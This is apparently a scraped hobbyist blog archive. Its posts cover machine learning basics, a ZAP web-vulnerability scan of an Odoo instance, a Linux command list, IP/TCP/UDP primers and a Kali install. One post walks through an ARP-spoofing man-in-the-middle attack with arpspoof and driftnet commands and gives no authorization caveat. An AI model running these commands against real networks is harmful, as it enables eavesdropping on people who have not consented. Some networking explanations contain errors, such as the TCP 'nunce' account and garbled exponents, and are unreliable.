Supervised Learning

supervised_learning

In this post, we will discussion about the most commonly used technique in Machine Learning – Supervised Learning. From the above image, most of you might have got the idea what Supervised Learning is. In supervised Learning, the computer is taught to identify the pattern in the data to be processed. In short, we are teaching the computer to identify the pattern. The formal definition of Supervised learning according to Wikipedia is

Supervised learning is the machine learning task of learning a function that maps an input to an output based on example input-output pairs.

Basically, we are training the computer with input and output. On course of time, the computer will start to find the pattern that defines output based on the input. This is the known as the learning function which can be used further to predict output for new inputs.

Lets look at some examples to understand the supervised learning.

House Price prediction

Lets predict the price of the house based on the area in square feet. Honestly, I dont have any idea about the price of the house. Lets assume the data is relevant.

The graph shows the relation between the area of the house and the area. Lets assume that you are interested in buying a 750 square feet house. From the image it is clear that the house costs around 220K. But say, you have changed your mind and want to buy a house of 1750 square feet. So to derive the price, you drew the blue line that represent the relation between the area and price. From the image it is clear the cost is around 500K i. This is similar to supervised learning.

The program is given the input as area and the labelled output as price for learning. The program derives a function (blue line) that can be used to predict the price on new area given as input. Here the blue line represensts the linear function. But, you can see that the yellow curve is more in relation with the points in the image. So its more accurate to predict the values using the yellow curve as reference. This is a quadratic function.

For your information, the price of the house is a continuous value, even though we round the price to the nearest 10s or 100s. So we consider this as a regression example.

Cancer Predection

Now lets predict whether the tumor is cancerous or not based on the size of tumor. The image shows the relation betwwen the size of the tumour and whether it is cancerous or not. 0 represent non-cancerous tumors and 1 represent cancerous tumors.

All the non-cancerous tumors are represented as blue dots and the cancerous tumors as red cross. Now lets assume that the green dot repesent a tumor. We have have to find whether it is a cancerous or non-cancerous tumor. Its clear from the image that it is  a non-cancerous tumor.

Here, the main purpose of the example is to classify whether the tumor is cancerous or not based on the size. This is an example of classification problem. Here 0 and 1 are the labels for classification problem. A classification prblem can have multiple number of lables. The input for the program is the size of the tumor and the labelled outputs are the whether it is cancerous or not. The program should find a optimal value for the size of the tumor which can be used as reference for the classification for new inputs.

Hope that you understood the supervised learning technique in Machine Learning. In the next post, we will discuss about Unsupervised learning. Feel free to cooment on the post.

Previous : Machine Learning – Introduction

Posted by Joyal Baby in ML and AI, 0 comments
Vulnerability scanning for web-application(odoo) using Zed Attack Proxy(ZAP)

Vulnerability scanning for web-application(odoo) using Zed Attack Proxy(ZAP)

Today we are going to see how to test an web-application using OWASP ZAP. It is one of the best scanner that you can find on internet and its an opensource project , so you can modify the application as of your needs.One of the advantage of using ZED over VEGA(a vulnerability scanning tool) is you can generate report for the testing that you have done . check out the top 10 OWASP vulnerability in the following link

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project 

In this tutorial i will be using kali linux which comes with per-installed ZAP tool.

***If you are using any other Linux operating system the download link is below

https://github.com/zaproxy/zaproxy/wiki/Downloads

Download the zip folder and extract.

Now open your terminal and navigate to the folder where you have extracted.

Open the file zap.sh file using the following command

./zap.sh

   In kali linux search for word "zed" and open the application

search zap
zap-opening

Step 1: Select the configuration for your zap application .I am selecting the default option and click "Start".

zap-welcome

Step 2 : Now lets generate the CA certificate for the browser to route the request and response (Proxy) through ZAP.

  • Go to Tools -->>Options
zed -cert-menuselection

Step 3 : Select the sub menu named "Dynamic SSL Certificates" from the option menu.

Then click Generate to generate your own SSL cert and save the cert in your pc.

zap-ca cert
save ssl cert

Step 4 : Lets open the browser (i am using firefox)and configuring it to zed.

  • settings-->>preference

Type "Network proxy" in the search-menu and make a search

and go-to settings

 

 

 

zed browser
zed-proxy

Step 5 : select "Manual proxy configuration"

  • HTTP Proxy :127.0.0.1
  • Port: 8080
  • Select and active the Use this proxy server for all protocols option.
  • "No Proxy for " delete the addresses such as 127.0.0.1,localhost if you have any
  • Save the configurations
zap-proxy-2

Step 6 : Enter the IP Address which you want to do the scan .

I am running the odoo web application which is running on the IP Address 192.168.0.103:8069

Now lets explore the application for the zed to capture .By doing the manual exploration it will help the zed to crawl the site and not leaving any page behind.(manual spidering).

As we explore the application zed will capture the requests which you can see the sites with flag notion under "sites" menu.

test browser
zed exploting application

Step 7 : Now lets start the scan by right click on the IP address under sites menu.

  • Attack -->> Active Scan
zed -attack

Step 8 : Select the node or you change the module you want to scan.i will be selecting the entire site by selecting the IP address.

zed select context

You can see the request , response code  in the bottom section of ZAP tool.The progress bar helps you to find scan progress

click the (+) tab and select the Alerts menu (which will categorize the vulnerabilities of the application).

zed scan
acan alerts

Step 9 : Once the scan gets completed you can find the vulnerabilities found in the web application .

Alerts section will help you out finding the vulnerabilities.

zed scan result

Step 10 : To save scanning result lets go to report menu on the top.

and select "Generate HTML report " menu to generate the report for further use.

zed report menu
save_report

The report will look something like this,It holds the detailed description about the vulnerability,priority and severity.

 

Thank you guys for you support .

zed report
Posted by ashokkumar in Hacking basics, 0 comments

Machine Learning

Introduction

What is Machine Learning ? There are many definition for Machine Learning (ML) that are very common.  In this post, we will have a quick look at what is ML and some of the applications of ML. Let’s take a look at one of the well know definition of ML by Arthur Samuel – one of the pioneer in the field of Artificial Intelligence (AI).

“The field of  study that gives the computers the ability to learn without being explicitly programmed .”

Back in the 1950’s, Arthur Samuel wrote a checkers playing program that played 10’s or 1000’s of plays againest itself. Eventually it learned the good and bad board position and evloved to be a better checkers player than Arthur Samuel himself. This was a remarkable result. This is beacause the program got more checkers playing experience from the 1000’s of plays, and got better and better.

Here is a rather new definition of ML by Tom Mitchell – An American computer scientist.

“A computer program is said to learn from experience E with respect to some task T and some performance measure P, if its performance on T, as measured by P improves with experience E.”

What it really mean is that if a program can improve its performance on a given task with the previous experience gained, then it is known as ML. Taking the checkers game, T is the task of playing checkers, E is the experience from the 1000’s of plays and P is the chance of winning the game.

Machine Learning Algorithms

The ML algorithms are mainly classified into two –

  • Supervised Learning
  • Unsupervised Learning

We will see about the types in detail in the upcoming posts. In short, Supervised Learning is the one in which we teach the computer to learn and in Unsupervised Learning, the computer learns by itself. You might have even heard about other tearms such as Reinforced Learning and Recommender systems, those are also  type of ML alogithms.

Applications of ML

There are many field of application for ML.Some of them are –

  • Spam email filtering used by Google, Yahoo, Outlook etc.
  • Recommeder sytem used by online shopping site like Amazon, Flipkart etc.
  • Stock market predection.
  • Autonomous weapons.

There are much more applications of ML, these are just some of them. In the next post, I will be explaining more about the Supervised learning algorithms.

Next : Supervised Learning

Posted by Joyal Baby in ML and AI, 0 comments

Useful Commands For Linux Users

  • cd — Changes the current terminal directory.
  • clear — Clears the terminal screen.
  • history — Displays a list of all recently used commands.
  • ls — Displays a list of all files in the current terminal directory.
  • man — Displays a help page (from the manual) based on your search query.
  • pwd — Displays the current terminal directory as an absolute path.
  • chmod/chown — The chmod command changes the read, write, and execute permissions of a file while the chown command changes the user and/or user group that owns a file.
  • cp — Makes a copy of a file.
  • find — Searches a specific directory (or your entire system) to find files that match a given set of criteria.
  • grep — Searches a specific file or set of files to see if a given string of text exists, and if it does, tells you where the text exists in those files.
  • locate — Searches the entire system for files or directories that match the search query, then outputs the absolute paths for each match.
  • mkdir/rmdir — Creates or deletes a directory, by default in the current terminal directory but a target directory can be specified as well. When deleting, the directory must be completely empty.
  • mv — Moves a file from one directory to another, and you can specify a different name for the file in the target directory.
  • nano/emacs/vim — The three main terminal text editors that exist on nearly all Linux systems, ordered by increasing complexity.
  • rename — Changes the name of a file or a set of files. Comes with a lot of interesting parameters, allowing you to automatically rename a bunch of files according to a pattern.
  • rm — Removes files. With a certain parameter, it can be used to wipe the entire contents of a specified directory. It can also be used to delete several files that all match a certain filename pattern.
  • touch — Changes the date accessed or date modified of the given file to right now.
  • wget — Downloads the file or page at the given web URL.
  • zip/gzip/tar — Various formats for compressing and decompressing file archives.
Posted by ashokkumar in Hacking basics, 0 comments

MITM attack

Hello guys today lets see how to perform a simple man in the middle attack using kali linux operating system.

First lets understand what is MITM Attack ?

Man in the middle attack is nothing but an unauthorized person is eavesdropping  to a conversation between two nodes.

mitm

Commends Used on the MITM Attack

sysctl -w net.ipv4.ip_forward=1
arpspoof -i <network_interface> -t <target ip>  <router ip>
arpspoof -i <network_interface> -t <router ip>  <target ip>
driftnet -i <network_interface>
sysctl -w net.ipv4.ip_forward=0

Lets Start the simple MITM Attack,

Open Your Kali Linux operating system and navigate to terminal and identify the following information

  • Your Target IP Address  --                        192.168.0.104
  • Your Router gateway Address                  192.168.0.1
  • Identify your network interface                 wlan0

[Note]: To perform this attack you and your attacker must be connected in the same network.

First Step:

sysctl -w net.ipv4.ip_forward=1

This command is used to do the port forwarding to start the MITM attack.

Second Step:

Here we are making the kali linux to intercept the communication between the

Router and the Target

arpspoof -i <network_interface> -t <target ip>  <router ip>

Example

arpspoof -i wlan0 -t 192.168.0.104 192.168.0.1

Third Step:

Continuity of interception process

arpspoof -i <network_interface> -t <router ip>  <target ip>

Example

arpspoof -i wlan0 -t 192.168.0.1 192.168.0.104

 

Fourth Step:

Lets start the driftnet tool to intercept the images which is being browsed on attacker web browser

 

driftnet -i <network_interface>

Example

driftnet -i wlan0

After this command the driftnet GUI window will open and you can see the images are being intercepted.

Fifth Step:

After this process most importantly disable the portforwarding process.

sysctl -w net.ipv4.ip_forward=0

 

 

Posted by ashokkumar in Hacking basics, 0 comments

What is IP Protocol?

Internet Protocol -IP

IP Stands for internet protocol , It is pronounced as separate letters.IP protocol is used to communicate between two or more systems in a network,IP protocol assigns unique address to each system in a network which helps in identifying system and make communication between those systems.

Types of IP address

  • IPV4 Address
  • IPV6 Address

Examples of IPV4 and IPV6 Addess

  •                     IPV4 Address    192.168.0.1
  •                     IPV6 Address    2001:cdba:0000:0000:0000:0000:3257:9652

Why there is IPv4 and IPv6 classification?

IPv4 addressing system is old way of addressing where the number of systems is limited to 4,294,967,296 ( 32-bits (232) )number of address in an network .

As there is a rapid growth technology the number of system in a network also increased so there is demand in address so we adapted to a new way of addressing system which is ipv6 Address which can provide 340,282,366,920,938,463,463,374,607,431,768,211,456 (128-bits (2128) ) number of address in an network.

 

Posted by ashokkumar in Networking, 0 comments

What is UDP Protocol

UDP - User Datagram Protocol

UDP pronounced as separate letters.UDP is also a type of protocol like TCP, used during the communication between two system. But UDP is undoubtedly different than TCP protocol in working mechanism.

User Datagram Protocol (UDP) communication is not reliable and secure. Because UPD does not acknowledge back to the server.

Best example of UDP protocols are Video streaming ,voip calls,online gaming.

(i.e When you visit Youtube and playing a video then Youtube server will send the packets continiously to your ip address without verifing weather you received the packet/ packet lost during the transmission).

There is no handshaking process in UDP communication,thus UDP is a stateless protocol.

UDP
Posted by ashokkumar in Networking, 0 comments

What is TCP Protocol?

Transmission Control Protocol -TCP

TCP pronounced as separate letters.TCP is one of the important and widely used protocols of the Internet protocol(IP).

This Protocol establish a persistant connection between two systems (i.e client and server).

(TCP)Transmission Contol Protocol is a stateful protocol why because when a client sends the request to server For Example from your browser(Client) you're visiting google.com(Server) .

The serve will generate a number called as nunce for the request and stores it to remember the request.

Then the google.com (server) will process your request and send's the result  to your Web Browser(Client) with the help of the the nunce number.

This process happens at macro/micro level in a seconds.TCP follows a Three-Way handshake process

tcp_3_way
Posted by ashokkumar in Networking, 0 comments

[Solution] Install kali Linux (2018.2) on virtual Box (Windows 10)

Softwares Required:

  • VirtualBox
  • kali linux operating system

 

Step1:

The necessary software download links are provided below please download before proceeding.(Please identify your system architecture and download the corresponding files ::For Example: i am using windows 10 which is a 64 bit architecture).

1.Virtualbox software

 

2. Kali linux .iso file (kali linux amd64).

Step2:  Install virtual box software which you have downloaded.

A Simple installation wizard Next->Next->Finish.

Step3: After Successful Installation of virtualbox lets configure virtualbox

 

Configuring Virtualbox for kali linux OS

Step 4: Lets install kali linux OS on virtualbox

The steps are provided in the following slideshows

Posted by ashokkumar in Hacking basics, 0 comments